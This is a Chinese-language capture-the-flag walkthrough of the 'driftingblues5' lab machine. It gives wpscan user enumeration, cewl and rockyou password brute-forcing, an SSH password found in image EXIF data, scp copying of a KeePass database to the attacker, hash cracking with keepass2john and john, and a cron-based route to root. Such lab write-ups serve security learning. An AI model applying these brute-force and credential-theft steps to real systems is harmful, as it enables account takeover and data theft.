攻击者ip:192.168.56.108 桥接(自动) vmare
受害者ip:192.168.56.127 仅主机 vxbox
主机发现
找到框架wordpress
wpscan枚举用户
wpscan --url http://192.168.56.127 -e u
获得用户名
abuzerkomurcucollinsgillsatanicgadd
访问web页面时显示的的一些介绍信息,尝试将该页面生成字典进行密码破解
cewl http://192.168.56.127 > pwd.txt
wpscan -U use.txt -P /usr/share/wordlists/rockyou.txt --url http://192.168.56.127
获得账号密码
gill / interchangeable
没有找到框架漏洞,但是有一张之前前端没有的图片
下载图片
wget http://192.168.56.127/wp-content/uploads/2021/02/dblogo.png
exif信息解析
ssh密码是59583hello当然是小写的也许不是
登录ssh
gill/59583hello
获得一个flag
发现一个kdbx文件
KDBX文件:由密码管理器KeePass Password Safe创建的文件;存储密码的加密数据库,该数据库只能使用用户设置的主密码进行查看; 用于安全存储Windows,电子邮件帐户,FTP站点,电子商务站点和其他目的的个人登录凭据。
https://www.reviversoft.com/zh-cn/file-extensions/kdbx
将文件复制到kali
scp [email protected]:/home/gill/keyfile.kdbx /root/Desktop
Linux scp 命令用于 Linux 之间复制文件和目录。
scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。
scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。
利用keepass2john工具获取其hash值方进行爆破
keepass2john keyfile.kdbx >hash.txt
有了哈希值,那就尝试用 john 暴破哈希值:
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
密码:porsiempre
用密码读取文件
keeppass下载地址:https://sourceforge.net/projects/keepass/
将这6个titile记录下
zakkwyldebuddyretard2real4surrealcloset313fracturedoceanexalted
提权
使用命令:find / -perm -4000 -type f 2>/dev/null查找下具有特殊权限的文件,但是没发现什么可以利用的点
上传pspy64
发现定时任务
进入keyfolder创建目录,名字是那6个titile
创建fracturedocean时,会得到root密码
imjustdrifting31
su root
获得flag
原文始发于微信公众号(王之暴龙战神):driftingblues5
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论